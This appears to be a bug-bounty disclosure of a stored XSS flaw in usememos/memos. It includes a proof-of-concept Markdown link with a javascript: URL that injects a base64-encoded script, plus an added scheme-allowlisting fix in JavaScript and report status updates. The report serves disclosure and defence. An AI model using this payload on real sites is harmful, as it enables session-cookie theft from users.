Stored XSS by link markdown in usememos/memos
Valid
Reported on Jan 5th 2023
Description
The site allows Markdown links but does not validate them, resulting in XSS.
Proof of Concept
Create a new memo with the payload:
[Click me!](javascript:document.body.innerHTML="<script src='data:text/javascript;base64,YWxlcnQob3JpZ2luKTs='></script>")
Hold Ctrl and click "Click me!"; an alert whose content is the domain name appears.
Impact
Stored XSS, which can be used to steal the victim's cookies...
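The missing validation described above can be supplied by allowlisting the scheme of each link target before an anchor is emitted. The following is an added example, not code from this report or from usememos/memos; the function names, the allowlist and the minimal link regex are assumptions made for illustration.

```javascript
// Added example (not memos code): allowlist the scheme of Markdown link targets.
const ALLOWED_SCHEMES = new Set(["http:", "https:", "mailto:"]); // assumed policy

// Returns a normalized href, or null when the target must not become a link.
// Relative targets are rejected in this sketch (new URL() throws without a base).
function safeHref(raw) {
  try {
    // The WHATWG parser trims whitespace, drops tabs/newlines and lowercases
    // the scheme, so it sees the same scheme the browser would act on.
    const parsed = new URL(raw);
    return ALLOWED_SCHEMES.has(parsed.protocol) ? parsed.href : null;
  } catch {
    return null;
  }
}

const HTML_ESCAPES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
function escapeHtml(s) {
  return s.replace(/[&<>"']/g, (c) => HTML_ESCAPES[c]);
}

// Renders [text](target); a rejected target stays as escaped source text.
function renderLinks(markdown) {
  let out = "";
  let last = 0;
  for (const m of markdown.matchAll(/\[([^\]]*)\]\(([^)]*)\)/g)) {
    out += escapeHtml(markdown.slice(last, m.index));
    const href = safeHref(m[2]);
    out += href === null
      ? escapeHtml(m[0])
      : `<a href="${escapeHtml(href)}" rel="noopener noreferrer">${escapeHtml(m[1])}</a>`;
    last = m.index + m[0].length;
  }
  return out + escapeHtml(markdown.slice(last));
}

// The payload from the proof of concept above, used as input.
const POC = `[Click me!](javascript:document.body.innerHTML="<script src='data:text/javascript;base64,YWxlcnQob3JpZ2luKTs='></script>")`;
console.log(renderLinks(POC)); // escaped text only, no anchor
console.log(renderLinks("[docs](https://example.com/a)"));
```

Parsing with the same URL algorithm the browser uses avoids mismatches where a string filter and the browser disagree about what the scheme is.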
Occurrences
We are processing your report and will contact the usememos/memos team within 24 hours.
4 days ago
We have contacted a member of the usememos/memos team and are waiting to hear back.
3 days ago
The researcher's credibility has increased: +7
memo.go#L19 has been validated